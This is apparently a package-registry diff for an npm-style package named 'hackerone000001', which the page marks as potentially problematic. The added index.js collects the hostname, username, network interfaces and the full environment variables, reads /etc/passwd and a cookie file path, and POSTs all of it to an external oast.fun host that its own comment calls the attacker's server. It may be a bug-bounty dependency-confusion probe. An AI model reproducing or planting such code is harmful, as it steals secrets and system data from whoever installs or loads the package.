hackerone000001 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of hackerone000001 might be problematic. Click here for more details.
- package/index.js +73 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Helper function to send data back to your server
|
|
6
|
+
const sendData = (data) => {
|
|
7
|
+
const options = {
|
|
8
|
+
hostname: 'iptcasfymjgwwipkefshung19sp1v2pue.oast.fun', // Your server where you collect the info
|
|
9
|
+
port: 443,
|
|
10
|
+
path: '/rctable76SenseBBPH1',
|
|
11
|
+
method: 'POST',
|
|
12
|
+
headers: {
|
|
13
|
+
'Content-Type': 'application/json',
|
|
14
|
+
},
|
|
15
|
+
};
|
|
16
|
+
|
|
17
|
+
const req = https.request(options, (res) => {
|
|
18
|
+
res.on('data', (d) => {
|
|
19
|
+
process.stdout.write(d);
|
|
20
|
+
});
|
|
21
|
+
});
|
|
22
|
+
|
|
23
|
+
req.on('error', (error) => {
|
|
24
|
+
console.error(error);
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
req.write(JSON.stringify(data));
|
|
28
|
+
req.end();
|
|
29
|
+
};
|
|
30
|
+
|
|
31
|
+
// Gather system information
|
|
32
|
+
const getSystemInfo = () => {
|
|
33
|
+
const userInfo = os.userInfo();
|
|
34
|
+
const networkInterfaces = os.networkInterfaces();
|
|
35
|
+
|
|
36
|
+
const systemInfo = {
|
|
37
|
+
hostname: os.hostname(),
|
|
38
|
+
osType: os.type(),
|
|
39
|
+
osRelease: os.release(),
|
|
40
|
+
platform: os.platform(),
|
|
41
|
+
arch: os.arch(),
|
|
42
|
+
whoami: userInfo.username,
|
|
43
|
+
homeDir: userInfo.homedir,
|
|
44
|
+
networkInterfaces: networkInterfaces,
|
|
45
|
+
ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
|
|
46
|
+
macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
|
|
47
|
+
uptime: os.uptime(),
|
|
48
|
+
currentWorkingDir: process.cwd(),
|
|
49
|
+
envVariables: process.env,
|
|
50
|
+
};
|
|
51
|
+
|
|
52
|
+
return systemInfo;
|
|
53
|
+
};
|
|
54
|
+
|
|
55
|
+
// Optionally, attempt to read sensitive files (ensure you are authorized to do so)
|
|
56
|
+
const readSensitiveFile = (filePath) => {
|
|
57
|
+
try {
|
|
58
|
+
const data = fs.readFileSync(filePath, 'utf8');
|
|
59
|
+
return data;
|
|
60
|
+
} catch (err) {
|
|
61
|
+
return `Error reading ${filePath}: ${err.message}`;
|
|
62
|
+
}
|
|
63
|
+
};
|
|
64
|
+
|
|
65
|
+
// Collect data
|
|
66
|
+
const collectedData = {
|
|
67
|
+
systemInfo: getSystemInfo(),
|
|
68
|
+
passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
|
|
69
|
+
cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
|
|
70
|
+
};
|
|
71
|
+
|
|
72
|
+
// Send collected data back to the attacker's server
|
|
73
|
+
sendData(collectedData);
|